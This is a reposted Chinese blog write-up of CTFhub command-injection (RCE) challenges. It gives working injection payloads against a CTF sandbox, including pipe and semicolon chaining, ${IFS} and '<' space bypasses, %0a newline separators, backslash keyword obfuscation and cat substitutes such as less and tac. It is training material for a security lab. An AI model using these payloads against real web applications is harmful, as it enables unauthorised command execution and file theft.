欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 维修 > CTFhub RCE命令注入学习

CTFhub RCE命令注入学习

2025/4/6 0:33:40 来源:https://blog.csdn.net/2301_77012231/article/details/143730078  浏览:    关键词:CTFhub RCE命令注入学习

命令注入

无过滤

127.0.0.1|ls

查看页面源代码找flag

过滤cat

一、解题思路
当cat被过滤后,可以使用一下命令进行读取文件的内容
(1)more:一页一页的显示的显示档案内容
(2)less:与more类似,但是比more更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出tac是cat的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体的内容

127.0.0.1|less flag_1071774546280.php

过滤空格

可是回显的是空格被过滤了,那么使用<或${IFS}试试

127.0.0.1|cat<flag_2557136742408.php

过滤目录分隔符

发现该文件夹中有一个名为flag_38323213124750.php的文件

127.0.0.1;cd flag_is_here;cat f*

过滤运算符

127.0.0.1;ls

127.0.0.1;cat flag_4418564522192.php

综合过滤练习

这关是比较好玩的

直接使用逗号分隔;进行分隔,执行ls命令,发现逗号;被过滤

命令分隔符的绕过姿势
;
%0a
%0d
&
那我们使用%0a试试,发现ls命令被成功执行

http://challenge-40d926e9e3bcab60.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0als

会进行url编码直接在上面插入

?ip=127.0.0.1%0acd${IFS}fla\g_is_here%0als

读取的时候发现过滤了cat,使用less绕过

http://challenge-40d926e9e3bcab60.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd${IFS}fla\g_is_here%0aless${IFS}fla\g_271482286916615.php

方法二
使用通配符进行绕过

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词